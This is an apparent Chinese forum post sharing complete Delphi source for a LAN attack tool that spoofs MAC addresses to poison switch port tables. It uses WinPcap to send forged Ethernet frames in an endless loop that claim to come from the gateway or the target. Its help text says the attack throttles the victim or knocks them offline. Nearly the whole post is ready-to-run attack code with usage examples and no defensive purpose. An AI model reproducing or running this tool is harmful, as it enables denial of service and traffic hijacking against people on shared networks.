基于MAC与PORT欺骗 比MAC与IP(ARP) 来得更容易些!
代码:
{*******************************************************} { } { 基于MAC与PORT欺骗 (无ARP) } { } { 版权所有 (C) 2009 Open[xgc] } { } {*******************************************************} program Test; {$APPTYPE CONSOLE} uses windows,SysUtils,IpHlpApi,IpTypes,Packet32,WinSock; const MAC_SIZE = 6; type MACADDRESS = array[0 .. MAC_SIZE - 1] of UCHAR; type ETHERNET_HDR = packed record Destination: MACADDRESS; Source: MACADDRESS; Protocol: WORD; end; function MactoStr(Mac: MACADDRESS): String; var ch1, ch2: Byte; i: Integer; begin Result := ''; for i := 0 to MAC_SIZE - 1 do begin ch1 := Mac[i] and $F0; ch1 := ch1 shr 4; if ch1 > 9 then ch1 := ch1 + Ord('A') - 10 else ch1 := ch1 + Ord('0'); ch2 := Mac[i] and $0F; if ch2 > 9 then ch2 := ch2 + Ord('A') - 10 else ch2 := ch2 + Ord('0'); Result := Result + Chr(ch1) + Chr(ch2); if i < 5 then Result := Result + ':'; end; end; function IPtoStr(IP: DWORD): String; begin result:=IntToStr((IP and $FF000000) shr 24 )+'.'; result:=result+IntToStr((IP and $00FF0000) shr 16 )+'.'; result:=result+IntToStr((IP and $0000FF00) shr 8 )+'.'; result:=Result+IntToStr((IP and $000000FF) shr 0 ); end; function Str2IP(s: String): DWORD; var i: Integer; Index: Integer; Digit: String; IP: array [0 .. 4 - 1] of DWORD; Len: Integer; begin //try Index := 1; for i := 0 to 4 - 1 do IP[i] := 0; Len := Length(s); for i := 0 to 4 - 1 do begin Digit := ''; while(s[Index] >= '0') and (s[Index] <= '9') and (Index <= Len) do begin Digit := Digit + s[Index]; inc(Index); end; inc(Index); IP[i] := StrToInt(Digit); end; Result := IP[0] shl 24 + IP[1] shl 16 + IP[2] shl 8 + IP[3] shl 0; // except // Result:=0; // end; end; function StrToMac(s: String): MACADDRESS; var i: Integer; Index: Integer; Ch: String; Mac: MACADDRESS; begin Index := 1; for i := 0 to MAC_SIZE - 1 do begin Ch := Copy(s, Index, 2); Mac[i] := StrToInt('$' + Ch); inc(Index, 2); while s[Index] = ':' do inc(Index); end; Result := Mac; end; Function GetSubStrNum(aString:String;SepChar:String):integer; var i:Integer; StrLen:Integer; Num:Integer; begin StrLen:=Length(aString); Num:=0; For i:=1 to StrLen do If Copy(aString,i,1) = SepChar then Num:=Num+1; result:=Num; end; function Split(Input: string; Deliminator: string; Index: Integer): string; var StringLoop, StringCount: Integer; Buffer: string; begin StringCount := 0; for StringLoop := 1 to Length(Input) do begin if (Copy(Input, StringLoop, 1) = Deliminator) then begin Inc(StringCount); if StringCount = Index then begin Result := Buffer; Exit; end else begin Buffer := ''; end; end else begin Buffer := Buffer + Copy(Input, StringLoop, 1); end; end; Result := Buffer; end; function GetMacByIP(Const IPAddr: string): string; var dwResult: DWord; nIPAddr: integer; nMacAddr: array[0..5] of Byte; nAddrLen: Cardinal; WSAData: TWSAData; begin if WSAStartup($101, WSAData)=-1 then Exit; nIPAddr := INet_Addr(PChar(IPAddr)); if nIPAddr = INADDR_NONE then exit; nAddrLen := 6; dwResult:= 1; try dwResult := SendARP(nIPAddr, 0, @nMacAddr, nAddrLen); except end; if dwResult = 0 then result := (IntToHex(nMacAddr[0], 2) + ':' + IntToHex(nMacAddr[1], 2) + ':' + IntToHex(nMacAddr[2], 2) + ':' + IntToHex(nMacAddr[3], 2) + ':' + IntToHex(nMacAddr[4], 2) + ':' + IntToHex(nMacAddr[5], 2)) else result := ''; WSACleanup; end; procedure MyNetwork(Ms: string;var IP: DWORD;var Mac: MACADDRESS;var Gateway: DWORD); var i: Integer; p, pAdapterInfo: PIP_ADAPTER_INFO; uOutBufLen: ULONG; dwRes: DWORD; begin pAdapterInfo := nil; uOutBufLen := 0; dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen); if dwRes = ERROR_BUFFER_OVERFLOW then begin GetMem(pAdapterInfo, uOutBufLen); dwRes := GetAdaptersInfo(pAdapterInfo, uOutBufLen); end; if dwRes <> ERROR_SUCCESS then begin exit; end; p := pAdapterInfo; while p <> nil do begin if Pos(String(p^.AdapterName), Ms) <> 0 then break; p := p^.Next; end; try if p <> nil then begin IP := Str2IP(p^.IpAddressList.IpAddress.S); for i := 0 to MAC_SIZE - 1 do Mac[i] := p^.Address[i]; Gateway := Str2IP(p^.GatewayList.IpAddress.S); end; except end; FreeMem(pAdapterInfo); end; procedure Help; begin WriteLn('******************************************************************'); WriteLn('* 基于MAC与PORT欺骗 *'); WriteLn('* 格式: Test.exe [IP地址] [网卡号] [模式:1欺骗网关 2欺骗目标]] *'); WriteLn('* 实例: Test.exe 192.168.0.1 0 1 或 Test.exe 192.168.0.1 0 1 *'); WriteLn('* 作用:强弱示攻击速度定 低速度达到限流 高速度达到断网 *'); WriteLn('* 作者:Open *'); WriteLn('******************************************************************'); end; function GetEthernet(M:Integer):string ; var Ethernet:string; NameLength,Num,i:Longword; NameList : Array [0..1024] of char; Name:array[0..10] of string; begin NameLength := 1024; ZeroMemory(@NameList,1024); PacketGetAdapterNames(NameList,@NameLength); for i:=0 to NameLength-1 do begin if ((NameList[i]=#0) and (NameList[i+1]=#0))then break else if ((NameList[i]=#0) and (NameList[i+1]<>#0))then NameList[i]:=char(','); end; Ethernet:=StrPas(NameList); Num:=GetSubStrNum(Ethernet,','); for i:=0 to Num do begin Name[i]:= Split(Ethernet,',',i+1); if M < 0 then begin Writeln('网卡列表:'); WriteLn(' ' + inttostr(i)+ ': Ethernet:'+ Name[i]); end; end; Result := Name[M]; end; var Ethernet,DesMac:string; p:Padapter; pp:Ppacket ; IP,Gateway: DWORD; Mac: MACADDRESS; SendData: ETHERNET_HDR; Ok:Boolean = True; begin Help; GetEthernet(-1); if (ParamStr(1) = '') and (ParamStr(2) = '') and (ParamStr(3) = '') then Exit; Ethernet := GetEthernet(StrToInt(ParamStr(2))); MyNetwork(Ethernet,ip,mac,Gateway); WriteLn('网 卡:'+ Ethernet); WriteLn('本机IP:'+iptostr(ip)); WriteLn('本机MAC:'+MacToStr(Mac)); WriteLn('本机网关:'+iptostr(Gateway)); WriteLn('目标IP:'+ ParamStr(1)); DesMac := GetMacByIP(ParamStr(1)); if DesMac = '' then begin WriteLn('获取目标MAC失败'); Exit; end; WriteLn('目标MAC:'+ DesMac); case StrToInt(ParamStr(3)) of 0: begin SendData.Destination := StrToMac(DesMac); //目标 SendData.Source := StrToMac(GetMacByIP(iptostr(Gateway)) ); //网关 end; 1: begin SendData.Destination := StrToMac(GetMacByIP(iptostr(Gateway)) ); //网关 SendData.Source := StrToMac(DesMac); //目标 end; end; SendData.Protocol := 0; p:= PacketOpenAdapter(pchar(Ethernet)); if (p=nil)or (p.hFile=INVALID_HANDLE_VALUE) then begin Writeln('初始化失败...'); Exit; end; pp:=PacketAllocatePacket; PacketInitPacket(pp, @SendData,SizeOf(SendData)); Writeln('开始欺骗......'); while ok do begin PacketSendPacket(p, pp, true); Sleep(10); end; PacketFreePacket(pp); PacketCloseAdapter(p); end.